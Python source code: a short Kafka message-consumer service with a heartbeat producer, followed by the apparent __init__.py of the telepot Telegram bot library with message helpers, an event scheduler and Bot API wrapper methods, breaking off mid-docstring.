fileConfig("logging_config.ini", disable_existing_loggers=False)
logger = logging.getLogger(__name__)
print = logger.info
STOPPED = False
consumer = None
def consume_messages():
while True and not STOPPED:
try:
message = consume_dict()
do_async_task(message, get_store_manager())
metrics_client.write_count("message_count", 1)
except:
logger.exception("exc when consuming messages")
metrics_client.write_exc("consume_exc", 1)
def exit_signal_handler(signal, frame):
print("signal {} received, about to exit ...".format(signal))
sys.exit(0)
def equip_signal():
signal.signal(signal.SIGINT, exit_signal_handler)
signal.signal(signal.SIGTERM, exit_signal_handler)
def heartbeat_producer():
while True:
try:
get_kafka_manager().send_dict({
"item_name": "test.test.test",
"puller_hash": "guldan_puller_hash",
"remote_addr": "127.0.0.1",
"iver": "1",
"cver": "0.1",
"ctype": "fake",
"cid": "1",
"lver": "last_version",
"pull_time": int(time.time())
})
except:
logger.exception("exc in heartbeat producer")
finally:
time.sleep(1)
def start_heartbeat_producer():
threading.Thread(target=heartbeat_producer).start()
def run():
equip_signal()
configs = get_configs()
print("init kafka manager ...")
init_kafka_manager(configs)
print("start heartbeat producer ...")
start_heartbeat_producer()
print("init store manager ...")
init_store_manager(configs.get("redis_url"))
print("start to consume messages ...")
consume_messages()
if __name__ == "__main__":
run()
|
__init__.py
|
import sys
import io
import time
import json
import threading
import traceback
import collections
import bisect
try:
import Queue as queue
except ImportError:
import queue
# Patch urllib3 for sending unicode filename
from . import hack
from . import exception
__version_info__ = (12, 7)
__version__ = '.'.join(map(str, __version_info__))
def flavor(msg):
"""
Return flavor of message or event.
A message's flavor may be one of these:
- ``chat``
- ``callback_query``
- ``inline_query``
- ``chosen_inline_result``
- ``shipping_query``
- ``pre_checkout_query``
An event's flavor is determined by the single top-level key.
"""
if 'message_id' in msg:
return 'chat'
elif 'id' in msg and 'chat_instance' in msg:
return 'callback_query'
elif 'id' in msg and 'query' in msg:
return 'inline_query'
elif 'result_id' in msg:
return 'chosen_inline_result'
elif 'id' in msg and 'shipping_address' in msg:
return 'shipping_query'
elif 'id' in msg and 'total_amount' in msg:
return 'pre_checkout_query'
else:
top_keys = list(msg.keys())
if len(top_keys) == 1:
return top_keys[0]
raise exception.BadFlavor(msg)
chat_flavors = ['chat']
inline_flavors = ['inline_query', 'chosen_inline_result']
def _find_first_key(d, keys):
for k in keys:
if k in d:
return k
raise KeyError('No suggested keys %s in %s' % (str(keys), str(d)))
all_content_types = [
'text', 'audio', 'document', 'game', 'photo', 'sticker', 'video', 'voice', 'video_note',
'contact', 'location', 'venue', 'new_chat_member', 'left_chat_member', 'new_chat_title',
'new_chat_photo', 'delete_chat_photo', 'group_chat_created', 'supergroup_chat_created',
'channel_chat_created', 'migrate_to_chat_id', 'migrate_from_chat_id', 'pinned_message',
'new_chat_members', 'invoice', 'successful_payment'
]
def glance(msg, flavor='chat', long=False):
"""
Extract "headline" info about a message.
Use parameter ``long`` to control whether a short or long tuple is returned.
When ``flavor`` is ``chat``
(``msg`` being a `Message <https://core.telegram.org/bots/api#message>`_ object):
- short: (content_type, ``msg['chat']['type']``, ``msg['chat']['id']``)
- long: (content_type, ``msg['chat']['type']``, ``msg['chat']['id']``, ``msg['date']``, ``msg['message_id']``)
*content_type* can be: ``text``, ``audio``, ``document``, ``game``, ``photo``, ``sticker``, ``video``, ``voice``,
``video_note``, ``contact``, ``location``, ``venue``, ``new_chat_member``, ``left_chat_member``, ``new_chat_title``,
``new_chat_photo``, ``delete_chat_photo``, ``group_chat_created``, ``supergroup_chat_created``,
``channel_chat_created``, ``migrate_to_chat_id``, ``migrate_from_chat_id``, ``pinned_message``,
``new_chat_members``, ``invoice``, ``successful_payment``.
When ``flavor`` is ``callback_query``
(``msg`` being a `CallbackQuery <https://core.telegram.org/bots/api#callbackquery>`_ object):
- regardless: (``msg['id']``, ``msg['from']['id']``, ``msg['data']``)
When ``flavor`` is ``inline_query``
(``msg`` being a `InlineQuery <https://core.telegram.org/bots/api#inlinequery>`_ object):
- short: (``msg['id']``, ``msg['from']['id']``, ``msg['query']``)
- long: (``msg['id']``, ``msg['from']['id']``, ``msg['query']``, ``msg['offset']``)
When ``flavor`` is ``chosen_inline_result``
(``msg`` being a `ChosenInlineResult <https://core.telegram.org/bots/api#choseninlineresult>`_ object):
- regardless: (``msg['result_id']``, ``msg['from']['id']``, ``msg['query']``)
When ``flavor`` is ``shipping_query``
(``msg`` being a `ShippingQuery <https://core.telegram.org/bots/api#shippingquery>`_ object):
- regardless: (``msg['id']``, ``msg['from']['id']``, ``msg['invoice_payload']``)
When ``flavor`` is ``pre_checkout_query``
(``msg`` being a `PreCheckoutQuery <https://core.telegram.org/bots/api#precheckoutquery>`_ object):
- short: (``msg['id']``, ``msg['from']['id']``, ``msg['invoice_payload']``)
- long: (``msg['id']``, ``msg['from']['id']``, ``msg['invoice_payload']``, ``msg['currency']``, ``msg['total_amount']``)
"""
def gl_chat():
content_type = _find_first_key(msg, all_content_types)
if long:
return content_type, msg['chat']['type'], msg['chat']['id'], msg['date'], msg['message_id']
else:
return content_type, msg['chat']['type'], msg['chat']['id']
def gl_callback_query():
return msg['id'], msg['from']['id'], msg['data']
def gl_inline_query():
if long:
return msg['id'], msg['from']['id'], msg['query'], msg['offset']
else:
return msg['id'], msg['from']['id'], msg['query']
def gl_chosen_inline_result():
return msg['result_id'], msg['from']['id'], msg['query']
def gl_shipping_query():
return msg['id'], msg['from']['id'], msg['invoice_payload']
def gl_pre_checkout_query():
if long:
return msg['id'], msg['from']['id'], msg['invoice_payload'], msg['currency'], msg['total_amount']
else:
return msg['id'], msg['from']['id'], msg['invoice_payload']
try:
fn = {'chat': gl_chat,
'callback_query': gl_callback_query,
'inline_query': gl_inline_query,
'chosen_inline_result': gl_chosen_inline_result,
'shipping_query': gl_shipping_query,
'pre_checkout_query': gl_pre_checkout_query}[flavor]
except KeyError:
raise exception.BadFlavor(flavor)
return fn()
def flance(msg, long=False):
"""
A combination of :meth:`telepot.flavor` and :meth:`telepot.glance`,
return a 2-tuple (flavor, headline_info), where *headline_info* is whatever extracted by
:meth:`telepot.glance` depending on the message flavor and the ``long`` parameter.
"""
f = flavor(msg)
g = glance(msg, flavor=f, long=long)
return f,g
def peel(event):
"""
Remove an event's top-level skin (where its flavor is determined), and return
the core content.
"""
return list(event.values())[0]
def fleece(event):
"""
A combination of :meth:`telepot.flavor` and :meth:`telepot.peel`,
return a 2-tuple (flavor, content) of an event.
"""
return flavor(event), peel(event)
def is_event(msg):
"""
Return whether the message looks like an event. That is, whether it has a flavor
that starts with an underscore.
"""
return flavor(msg).startswith('_')
def origin_identifier(msg):
"""
Extract the message identifier of a callback query's origin. Returned value
is guaranteed to be a tuple.
``msg`` is expected to be ``callback_query``.
"""
if 'message' in msg:
return msg['message']['chat']['id'], msg['message']['message_id']
elif 'inline_message_id' in msg:
return msg['inline_message_id'],
else:
raise ValueError()
def message_identifier(msg):
"""
Extract an identifier for message editing. Useful with :meth:`telepot.Bot.editMessageText`
and similar methods. Returned value is guaranteed to be a tuple.
``msg`` is expected to be ``chat`` or ``choson_inline_result``.
"""
if 'chat' in msg and 'message_id' in msg:
return msg['chat']['id'], msg['message_id']
elif 'inline_message_id' in msg:
return msg['inline_message_id'],
else:
raise ValueError()
def _dismantle_message_identifier(f):
if isinstance(f, tuple):
if len(f) == 2:
return {'chat_id': f[0], 'message_id': f[1]}
elif len(f) == 1:
return {'inline_message_id': f[0]}
else:
raise ValueError()
else:
return {'inline_message_id': f}
def _split_input_media_array(media_array):
def ensure_dict(input_media):
if isinstance(input_media, tuple) and hasattr(input_media, '_asdict'):
return input_media._asdict()
elif isinstance(input_media, dict):
return input_media
else:
raise ValueError()
def given_attach_name(input_media):
if isinstance(input_media['media'], tuple):
return input_media['media'][0]
else:
return None
def attach_name_generator(used_names):
x = 0
while 1:
x += 1
name = 'media' + str(x)
if name in used_names:
continue;
yield name
def split_media(input_media, name_generator):
file_spec = input_media['media']
# file_id, URL
if _isstring(file_spec):
return (input_media, None)
# file-object
# (attach-name, file-object)
# (attach-name, (filename, file-object))
if isinstance(file_spec, tuple):
name, f = file_spec
else:
name, f = next(name_generator), file_spec
m = input_media.copy()
m['media'] = 'attach://' + name
return (m, (name, f))
ms = [ensure_dict(m) for m in media_array]
used_names = [given_attach_name(m) for m in ms if given_attach_name(m) is not None]
name_generator = attach_name_generator(used_names)
splitted = [split_media(m, name_generator) for m in ms]
legal_media, attachments = map(list, zip(*splitted))
files_to_attach = dict([a for a in attachments if a is not None])
return (legal_media, files_to_attach)
PY_3 = sys.version_info.major >= 3
_string_type = str if PY_3 else basestring
_file_type = io.IOBase if PY_3 else file
def _isstring(s):
return isinstance(s, _string_type)
def _isfile(f):
return isinstance(f, _file_type)
from . import helper
def flavor_router(routing_table):
router = helper.Router(flavor, routing_table)
return router.route
class _BotBase(object):
def __init__(self, token):
self._token = token
self._file_chunk_size = 65536
def _strip(params, more=[]):
return {key: value for key,value in params.items() if key not in ['self']+more}
def _rectify(params):
def make_jsonable(value):
if isinstance(value, list):
return [make_jsonable(v) for v in value]
elif isinstance(value, dict):
return {k:make_jsonable(v) for k,v in value.items() if v is not None}
elif isinstance(value, tuple) and hasattr(value, '_asdict'):
return {k:make_jsonable(v) for k,v in value._asdict().items() if v is not None}
else:
return value
def flatten(value):
v = make_jsonable(value)
if isinstance(v, (dict, list)):
return json.dumps(v, separators=(',',':'))
else:
return v
# remove None, then json-serialize if needed
return {k: flatten(v) for k,v in params.items() if v is not None}
from . import api
class Bot(_BotBase):
class Scheduler(threading.Thread):
# A class that is sorted by timestamp. Use `bisect` module to ensure order in event queue.
Event = collections.namedtuple('Event', ['timestamp', 'data'])
Event.__eq__ = lambda self, other: self.timestamp == other.timestamp
Event.__ne__ = lambda self, other: self.timestamp != other.timestamp
Event.__gt__ = lambda self, other: self.timestamp > other.timestamp
Event.__ge__ = lambda self, other: self.timestamp >= other.timestamp
Event.__lt__ = lambda self, other: self.timestamp < other.timestamp
Event.__le__ = lambda self, other: self.timestamp <= other.timestamp
def __init__(self):
super(Bot.Scheduler, self).__init__()
self._eventq = []
self._lock = threading.RLock() # reentrant lock to allow locked method calling locked method
self._event_handler = None
def _locked(fn):
def k(self, *args, **kwargs):
with self._lock:
return fn(self, *args, **kwargs)
return k
@_locked
def _insert_event(self, data, when):
ev = self.Event(when, data)
bisect.insort(self._eventq, ev)
return ev
@_locked
def _remove_event(self, event):
# Find event according to its timestamp.
# Index returned should be one behind.
i = bisect.bisect(self._eventq, event)
# Having two events with identical timestamp is unlikely but possible.
# I am going to move forward and compare timestamp AND object address
# to make sure the correct object is found.
while i > 0:
i -= 1
e = self._eventq[i]
if e.timestamp != event.timestamp:
raise exception.EventNotFound(event)
elif id(e) == id(event):
self._eventq.pop(i)
return
raise exception.EventNotFound(event)
@_locked
def _pop_expired_event(self):
if not self._eventq:
return None
if self._eventq[0].timestamp <= time.time():
return self._eventq.pop(0)
else:
return None
def event_at(self, when, data):
"""
Schedule some data to emit at an absolute timestamp.
:type when: int or float
:type data: dictionary
:return: an internal Event object
"""
return self._insert_event(data, when)
def event_later(self, delay, data):
"""
Schedule some data to emit after a number of seconds.
:type delay: int or float
:type data: dictionary
:return: an internal Event object
"""
return self._insert_event(data, time.time()+delay)
def event_now(self, data):
"""
Emit some data as soon as possible.
:type data: dictionary
:return: an internal Event object
"""
return self._insert_event(data, time.time())
def cancel(self, event):
"""
Cancel an event.
:type event: an internal Event object
"""
self._remove_event(event)
def run(self):
while 1:
e = self._pop_expired_event()
while e:
if callable(e.data):
d = e.data() # call the data-producing function
if d is not None:
self._event_handler(d)
else:
self._event_handler(e.data)
e = self._pop_expired_event()
time.sleep(0.1)
def run_as_thread(self):
self.daemon = True
self.start()
def on_event(self, fn):
self._event_handler = fn
def __init__(self, token):
super(Bot, self).__init__(token)
self._scheduler = self.Scheduler()
self._router = helper.Router(flavor, {'chat': lambda msg: self.on_chat_message(msg),
'callback_query': lambda msg: self.on_callback_query(msg),
'inline_query': lambda msg: self.on_inline_query(msg),
'chosen_inline_result': lambda msg: self.on_chosen_inline_result(msg)})
# use lambda to delay evaluation of self.on_ZZZ to runtime because
# I don't want to require defining all methods right here.
@property
def scheduler(self):
return self._scheduler
@property
def router(self):
return self._router
def handle(self, msg):
self._router.route(msg)
def _api_request(self, method, params=None, files=None, **kwargs):
return api.request((self._token, method, params, files), **kwargs)
def _api_request_with_file(self, method, params, file_key, file_value, **kwargs):
if _isstring(file_value):
params[file_key] = file_value
return self._api_request(method, _rectify(params), **kwargs)
else:
files = {file_key: file_value}
return self._api_request(method, _rectify(params), files, **kwargs)
def getMe(self):
""" See: https://core.telegram.org/bots/api#getme """
return self._api_request('getMe')
def sendMessage(self, chat_id, text,
parse_mode=None,
disable_web_page_preview=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendmessage """
p = _strip(locals())
return self._api_request('sendMessage', _rectify(p))
def forwardMessage(self, chat_id, from_chat_id, message_id,
disable_notification=None):
""" See: https://core.telegram.org/bots/api#forwardmessage """
p = _strip(locals())
return self._api_request('forwardMessage', _rectify(p))
def sendPhoto(self, chat_id, photo,
caption=None,
parse_mode=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendphoto
:param photo:
- string: ``file_id`` for a photo existing on Telegram servers
- string: HTTP URL of a photo from the Internet
- file-like object: obtained by ``open(path, 'rb')``
- tuple: (filename, file-like object). If the filename contains
non-ASCII characters and you are using Python 2.7, make sure the
filename is a unicode string.
"""
p = _strip(locals(), more=['photo'])
return self._api_request_with_file('sendPhoto', _rectify(p), 'photo', photo)
def sendAudio(self, chat_id, audio,
caption=None,
parse_mode=None,
duration=None,
performer=None,
title=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendaudio
:param audio: Same as ``photo`` in :meth:`telepot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['audio'])
return self._api_request_with_file('sendAudio', _rectify(p), 'audio', audio)
def sendDocument(self, chat_id, document,
caption=None,
parse_mode=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#senddocument
:param document: Same as ``photo`` in :meth:`telepot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['document'])
return self._api_request_with_file('sendDocument', _rectify(p), 'document', document)
def sendVideo(self, chat_id, video,
duration=None,
width=None,
height=None,
caption=None,
parse_mode=None,
supports_streaming=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendvideo
:param video: Same as ``photo`` in :meth:`telepot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['video'])
return self._api_request_with_file('sendVideo', _rectify(p), 'video', video)
def sendVoice(self, chat_id, voice,
caption=None,
parse_mode=None,
duration=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendvoice
:param voice: Same as ``photo`` in :meth:`telepot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['voice'])
return self._api_request_with_file('sendVoice', _rectify(p), 'voice', voice)
def sendVideoNote(self, chat_id, video_note,
duration=None,
length=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendvideonote
:param video_note: Same as ``photo`` in :meth:`telepot.Bot.sendPhoto`
:param length:
Although marked as optional, this method does not seem to work without
it being specified. Supply any integer you want. It seems to have no effect
on the video note's display size.
"""
p = _strip(locals(), more=['video_note'])
return self._api_request_with_file('sendVideoNote', _rectify(p), 'video_note', video_note)
def sendMediaGroup(self, chat_id, media,
disable_notification=None,
reply_to_message_id=None):
"""
See: https://core.telegram.org/bots/api#sendmediagroup
:type media: array of `InputMedia <https://core.telegram.org/bots/api#inputmedia>`_ objects
:param media:
To indicate media locations, each InputMedia object's ``media`` field
should be one of these:
- string: ``file_id`` for a file existing on Telegram servers
- string: HTTP URL of a file from the Internet
- file-like object: obtained by ``open(path, 'rb')``
- tuple: (form-data name, file-like object)
- tuple: (form-data name, (filename, file-like object))
In case of uploading, you may supply customized multipart/form-data
names for each uploaded file (as in last 2 options above). Otherwise,
telepot assigns unique names to each uploaded file. Names assigned by
telepot will not collide with user-supplied names, if any.
"""
p = _strip(locals(), more=['media'])
legal_media, files_to_attach = _split_input_media_array(media)
p['media'] = legal_media
return self._api_request('sendMediaGroup', _rectify(p), files_to_attach)
def sendLocation(self, chat_id, latitude, longitude,
live_period=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendlocation """
p = _strip(locals())
return self._api_request('sendLocation', _rectify(p))
def editMessageLiveLocation(self, msg_identifier, latitude, longitude,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagelivelocation
:param msg_identifier: Same as in :meth:`.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('editMessageLiveLocation', _rectify(p))
def stopMessageLiveLocation(self, msg_identifier,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#stopmessagelivelocation
:param msg_identifier: Same as in :meth:`.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('stopMessageLiveLocation', _rectify(p))
def sendVenue(self, chat_id, latitude, longitude, title, address,
foursquare_id=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendvenue """
p = _strip(locals())
return self._api_request('sendVenue', _rectify(p))
def sendContact(self, chat_id, phone_number, first_name,
last_name=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendcontact """
p = _strip(locals())
return self._api_request('sendContact', _rectify(p))
def sendGame(self, chat_id, game_short_name,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendgame """
p = _strip(locals())
return self._api_request('sendGame', _rectify(p))
def sendInvoice(self, chat_id, title, description, payload,
provider_token, start_parameter, currency, prices,
provider_data=None,
photo_url=None,
photo_size=None,
photo_width=None,
photo_height=None,
need_name=None,
need_phone_number=None,
need_email=None,
need_shipping_address=None,
is_flexible=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendinvoice """
p = _strip(locals())
return self._api_request('sendInvoice', _rectify(p))
def sendChatAction(self, chat_id, action):
""" See: https://core.telegram.org/bots/api#sendchataction """
p = _strip(locals())
return self._api_request('sendChatAction', _rectify(p))
def getUserProfilePhotos(self, user_id,
offset=None,
limit=None):
""" See: https://core.telegram.org/bots/api#getuserprofilephotos """
p = _strip(locals())
return self._api_request('getUserProfilePhotos', _rectify(p))
def getFile(self, file_id):
""" See: https://core.telegram.org/bots/api#getfile """
p = _strip(locals())
return self._api_request('getFile', _rectify(p))
def kickChatMember(self, chat_id, user_id,
until_date=None):
""" See: https://core.telegram.org/bots/api#kickchatmember """
p = _strip(locals())
return self._api_request('kickChatMember', _rectify(p))
def unbanChatMember(self, chat_id, user_id):
""" See: https://core.telegram.org/bots/api#unbanchatmember """
p = _strip(locals())
return self._api_request('unbanChatMember', _rectify(p))
def restrictChatMember(self, chat_id, user_id,
until_date=None,
can_send_messages=None,
can_send_media_messages=None,
can_send_other_messages=None,
can_add_web_page_previews=None):
""" See: https://core.telegram.org/bots/api#restrictchatmember """
p = _strip(locals())
return self._api_request('restrictChatMember', _rectify(p))
def promoteChatMember(self, chat_id, user_id,
can_change_info=None,
can_post_messages=None,
can_edit_messages=None,
can_delete_messages=None,
can_invite_users=None,
can_restrict_members=None,
can_pin_messages=None,
can_promote_members=None):
""" See: https://core.telegram.org/bots/api#promotechatmember """
p = _strip(locals())
return self._api_request('promoteChatMember', _rectify(p))
def exportChatInviteLink(self, chat_id):
""" See: https://core.telegram.org/bots/api#exportchatinvitelink """
p = _strip(locals())
return self._api_request('exportChatInviteLink', _rectify(p))
def setChatPhoto(self, chat_id, photo):
""" See: https://core.telegram.org/bots/api#setchatphoto """
p = _strip(locals(), more=['photo'])
return self._api_request_with_file('setChatPhoto', _rectify(p), 'photo', photo)
def deleteChatPhoto(self, chat_id):
""" See: https://core.telegram.org/bots/api#deletechatphoto """
p = _strip(locals())
return self._api_request('deleteChatPhoto', _rectify(p))
def setChatTitle(self, chat_id, title):
""" See: https://core.telegram.org/bots/api#setchattitle """
p = _strip(locals())
return self._api_request('setChatTitle', _rectify(p))
def setChatDescription(self, chat_id,
description=None):
""" See: https://core.telegram.org/bots/api#setchatdescription """
p = _strip(locals())
return self._api_request('setChatDescription', _rectify(p))
def pinChatMessage(self, chat_id, message_id,
disable_notification=None):
""" See: https://core.telegram.org/bots/api#pinchatmessage """
p = _strip(locals())
return self._api_request('pinChatMessage', _rectify(p))
def unpinChatMessage(self, chat_id):
""" See: https://core.telegram.org/bots/api#unpinchatmessage """
p = _strip(locals())
return self._api_request('unpinChatMessage', _rectify(p))
def leaveChat(self, chat_id):
""" See: https://core.telegram.org/bots/api#leavechat """
p = _strip(locals())
return self._api_request('leaveChat', _rectify(p))
def getChat(self, chat_id):
""" See: https://core.telegram.org/bots/api#getchat """
p = _strip(locals())
return self._api_request('getChat', _rectify(p))
def getChatAdministrators(self, chat_id):
""" See: https://core.telegram.org/bots/api#getchatadministrators """
p = _strip(locals())
return self._api_request('getChatAdministrators', _rectify(p))
def getChatMembersCount(self, chat_id):
""" See: https://core.telegram.org/bots/api#getchatmemberscount """
p = _strip(locals())
return self._api_request('getChatMembersCount', _rectify(p))
def getChatMember(self, chat_id, user_id):
""" See: https://core.telegram.org/bots/api#getchatmember """
p = _strip(locals())
return self._api_request('getChatMember', _rectify(p))
def setChatStickerSet(self, chat_id, sticker_set_name):
""" See: https://core.telegram.org/bots/api#setchatstickerset """
p = _strip(locals())
return self._api_request('setChatStickerSet', _rectify(p))
def deleteChatStickerSet(self, chat_id):
""" See: https://core.telegram.org/bots/api#deletechatstickerset """
p = _strip(locals())
return self._api_request('deleteChatStickerSet', _rectify(p))
def answerCallbackQuery(self, callback_query_id,
text=None,
show_alert=None,
url=None,
cache_time=None):
""" See: https://core.telegram.org/bots/api#answercallbackquery """
p = _strip(locals())
return self._api_request('answerCallbackQuery', _rectify(p))
def answerShippingQuery(self, shipping_query_id, ok,
shipping_options=None,
error_message=None):
""" See: https://core.telegram.org/bots/api#answershippingquery """
p = _strip(locals())
return self._api_request('answerShippingQuery', _rectify(p))
def answerPreCheckoutQuery(self, pre_checkout_query_id, ok,
error_message=None):
""" See: https://core.telegram.org/bots/api#answerprecheckoutquery """
p = _strip(locals())
return self._api_request('answerPreCheckoutQuery', _rectify(p))
def editMessageText(self, msg_identifier, text,
parse_mode=None,
disable_web_page_preview=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagetext
:param msg_identifier:
a 2-tuple (``chat_id``, ``message_id``),
a 1-tuple (``inline_message_id``),
or simply ``inline_message_id``.
You may extract this value easily with :meth:`telepot.message_identifier`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('editMessageText', _rectify(p))
def editMessageCaption(self, msg_identifier,
caption=None,
parse_mode=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagecaption
:param msg_identifier: Same as ``msg_identifier`` in :meth:`telepot.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('editMessageCaption', _rectify(p))
def editMessageReplyMarkup(self, msg_identifier,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagereplymarkup
:param msg_identifier: Same as ``msg_identifier`` in :meth:`telepot.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('editMessageReplyMarkup', _rectify(p))
def deleteMessage(self, msg_identifier):
"""
See: https://core.telegram.org/bots/api#deletemessage
:param msg_identifier:
Same as ``msg_identifier`` in :meth:`telepot.Bot.editMessageText`,
except this method does not work on inline messages.
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('deleteMessage', _rectify(p))
def sendSticker(self, chat_id, sticker,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendsticker
:param sticker: Same as ``photo`` in :meth:`telepot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['sticker'])
return self._api_request_with_file('sendSticker', _rectify(p), 'sticker', sticker)
def getStickerSet(self, name):
"""
See: https://core.telegram.org/bots/api#getstickerset
"""
p = _strip(locals())
return self._api_request('getStickerSet', _rectify(p))
def uploadStickerFile(self, user_id, png_sticker):
"""
See: https://core.telegram.org/bots/api#uploadstickerfile
"""
p = _strip(locals(), more=['png_sticker'])
return self._api_request_with_file('uploadStickerFile', _rectify(p), 'png_sticker', png_sticker)
def createNewStickerSet(self, user_id, name, title, png_sticker, emojis,
contains_masks=None,
mask_position=None):
"""
See: https://core.telegram.org/bots/api#createnewstickerset
"""
p = _strip(locals(), more=['png_sticker'])
return self._api_request_with_file('createNewStickerSet', _rectify(p), 'png_sticker', png_sticker)
def addStickerToSet(self, user_id, name, png_sticker, emojis,
mask_position=None):
"""
See: https://core.telegram.org/bots/api#addstickertoset
"""
p = _strip(locals(), more=['png_sticker'])
return self._api_request_with_file('addStickerToSet', _rectify(p), 'png_sticker', png_sticker)
def setStickerPositionInSet(self, sticker, position):
"""
See: https://core.telegram.org/bots/api#setstickerpositioninset
"""
p = _strip(locals())
return self._api_request('setStickerPositionInSet', _rectify(p))
def deleteStickerFromSet(self, sticker):
"""
See: https://core.telegram.org/bots/api#deletestickerfromset
"""
p = _strip(locals())
return self._api_request('deleteStickerFromSet', _rectify(p))
def answerInlineQuery(self, inline_query_id, results,
cache_time=None,
is_personal=None,
next_offset=None,
switch_pm_text=None,
switch_pm_parameter=None):
""" See: https://core.telegram.org/bots/api#answerinlinequery """
p = _strip(locals())
return self._api_request('answerInlineQuery', _rectify(p))
def getUpdates(self,
offset=None,
limit=None,
timeout=None,
allowed_updates=None):
""" See: https://core.telegram.org/bots/api#getupdates """
p = _strip(locals())
return self._api_request('getUpdates', _rectify(p))
def setWebhook(self,
url=None,
certificate=None,
max_connections=None,
allowed_updates=None):
""" See: https://core.telegram.org/bots/api#setwebhook """
p = _strip(locals(), more=['certificate'])
if certificate:
files = {'certificate': certificate}
return self._api_request('setWebhook', _rectify(p), files)
else:
return self._api_request('setWebhook', _rectify(p))
def deleteWebhook(self):
""" See: https://core.telegram.org/bots/api#deletewebhook """
return self._api_request('deleteWebhook')
def getWebhookInfo(self):
""" See: https://core.telegram.org/bots/api#getwebhookinfo """
return self._api_request('getWebhookInfo')
def setGameScore(self, user_id, score, game_message_identifier,
force=None,
disable_edit_message=None):
"""
See: https://core.telegram.org/bots/api#setgamescore
:param game_message_identifier: Same as ``msg_identifier`` in :meth:`telepot.Bot.editMessageText`
"""
p = _strip(locals(), more=['game_message_identifier'])
p.update(_dismantle_message_identifier(game_message_identifier))
return self._api_request('setGameScore', _rectify(p))
def getGameHighScores(self, user_id, game_message_identifier):
"""
See: https://core.telegram.org/bots/api#getgamehighscores
:param game_message_identifier: Same as ``msg_identifier`` in :meth:`telepot.Bot.editMessageText`
"""
p = _strip(locals(), more=['game_message_identifier'])
p.update(_dismantle_message_identifier(game_message_identifier))
return self._api_request('getGameHighScores', _rectify(p))
def download_file(self, file_id, dest):
"""
Download a file to local disk.
:param dest: a path or a ``file`` object
"""
f = self.getFile(file_id)
try:
d = dest if _isfile(dest) else open(dest, 'wb')
r = api.download((self._token, f['file_path']), preload_content=False)
while 1:
data = r.read(self._file_chunk_size)
if not data:
break
d.write(data)
finally:
if not _isfile(dest) and 'd' in locals():
d.close()
if 'r' in locals():
r.release_conn()
def message_loop(self, callback=None, relax=0.1,
timeout=20, allowed_updates=None,
source=None, ordered=True, maxhold=3,
run_forever=False):
"""
:deprecated: will be removed in future. Use :class:`.MessageLoop` instead.
Spawn a thread to constantly ``getUpdates`` or pull updates from a queue.
Apply ``callback`` to every message received. Also starts the scheduler thread
for internal events.
:param callback:
a function that takes one argument (the message), or a routing table.
If ``None``, the bot's ``handle`` method is used.
A *routing table* is a dictionary of ``{flavor: function}``, mapping messages to appropriate
handler functions according to their flavors. It allows you to define functions specifically
to handle one flavor of messages. It usually looks like this: ``{'chat': fn1,
'callback_query': fn2, 'inline_query': fn3, ...}``. Each handler function should take
one argument (the message).
:param source:
Source of updates.
If ``None``, ``getUpdates`` is used to obtain new messages from Telegram servers.
If it is a synchronized queue (``Queue.Queue`` in Python 2.7 or
``queue.Queue`` in Python 3), new messages are pulled from the queue.
A web application implementing a webhook can dump updates into the queue,
while the bot pulls from it. This is how telepot can be integrated with webhooks.
Acceptable contents in queue:
- ``str``, ``unicode`` (Python 2.7), or ``bytes`` (Python 3, decoded using UTF-8)
representing a JSON-serialized `Update <https://core.telegram.org/bots/api#update>`_ object.
- a ``dict`` representing an Update object.
When ``source`` is ``None``, these parameters are meaningful:
:type relax: float
:param relax: seconds between each ``getUpdates``
:type timeout: int
:param timeout:
``timeout`` parameter supplied to :meth:`telepot.Bot.getUpdates`,
controlling how long to poll.
:type allowed_updates: array of string
:param allowed_updates:
``allowed_updates`` parameter supplied to :meth:`telepot.Bot.getUpdates`,
controlling which types of updates to receive.
When ``source`` is a queue, these parameters are meaningful:
:type ordered: bool
:param ordered:
If ``True``, ensure in-order delivery of messages to ``callback``
(i.e. updates with a smaller ``update_id`` always come before those with
a larger ``update_id``).
